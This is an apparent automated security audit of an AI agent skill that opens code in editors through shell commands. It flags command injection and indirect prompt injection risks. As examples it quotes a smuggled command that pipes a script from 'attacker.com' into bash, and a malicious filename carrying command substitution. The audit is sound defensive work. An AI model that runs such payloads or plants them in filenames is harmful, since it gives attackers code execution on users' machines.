code-walk-thru
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to execute shell commands using templates like
code --goto <file_path>:<line_number>andvim +<line> <file>. - Evidence: Instructions in
SKILL.mdexplicitly list CLI commands for VSCode, PyCharm, IntelliJ, Zed, and Vim/Neovim. - Risk: If the agent interpolates a
<file_path>or<line_number>containing shell metacharacters (e.g.,path/to/file; curl http://attacker.com | bash), it can result in arbitrary command execution on the host machine. - [PROMPT_INJECTION] (HIGH): The skill exhibits a significant Indirect Prompt Injection surface (Category 8) because it uses untrusted data (file paths/names from the environment) to construct executable commands.
- Ingestion points: The agent determines the
<file_path>from the local filesystem or project context. - Boundary markers: Absent. There are no instructions to sanitize or validate the file paths before execution.
- Capability inventory: Shell command execution (
subprocess.runor similar) is required to fulfill the skill's purpose. - Sanitization: None. The skill does not provide logic for escaping shell-sensitive characters.
- Risk: An attacker could place a file with a malicious name in a repository (e.g.,
$(touch_evildone).js). If a user asks the agent to 'walk through' the project, the agent might execute the payload embedded in the filename.
Recommendations
- AI detected serious security threats
Audit Metadata